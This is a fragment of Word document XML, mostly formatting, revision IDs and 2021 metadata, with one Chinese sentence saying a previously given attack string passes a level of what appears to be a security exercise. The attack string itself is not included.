        <w:t>经测试，上述</w:t>
      </w:r>
      <w:r w:rsidR="004E4D45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以通过本关卡。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00203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61"/>
    <w:rsid w:val="00164D0A"/>
    <w:rsid w:val="00203D20"/>
    <w:rsid w:val="00212432"/>
    <w:rsid w:val="003020CE"/>
    <w:rsid w:val="00395C71"/>
    <w:rsid w:val="003B7061"/>
    <w:rsid w:val="00474C39"/>
    <w:rsid w:val="004E4D45"/>
    <w:rsid w:val="007366F5"/>
    <w:rsid w:val="00757E69"/>
    <w:rsid w:val="0085141D"/>
    <w:rsid w:val="00952077"/>
    <w:rsid w:val="00AB14C4"/>
    <w:rsid w:val="00B55309"/>
    <w:rsid w:val="00BE4F1B"/>
    <w:rsid w:val="00BF036C"/>
    <w:rsid w:val="00BF1D3F"/>
    <w:rsid w:val="00C571B2"/>
    <w:rsid w:val="00DD10A4"/>
    <w:rsid w:val="00F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FB41"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8DEDAD26-ED21-44DD-B01F-4515810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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-29T04:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-29T07:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>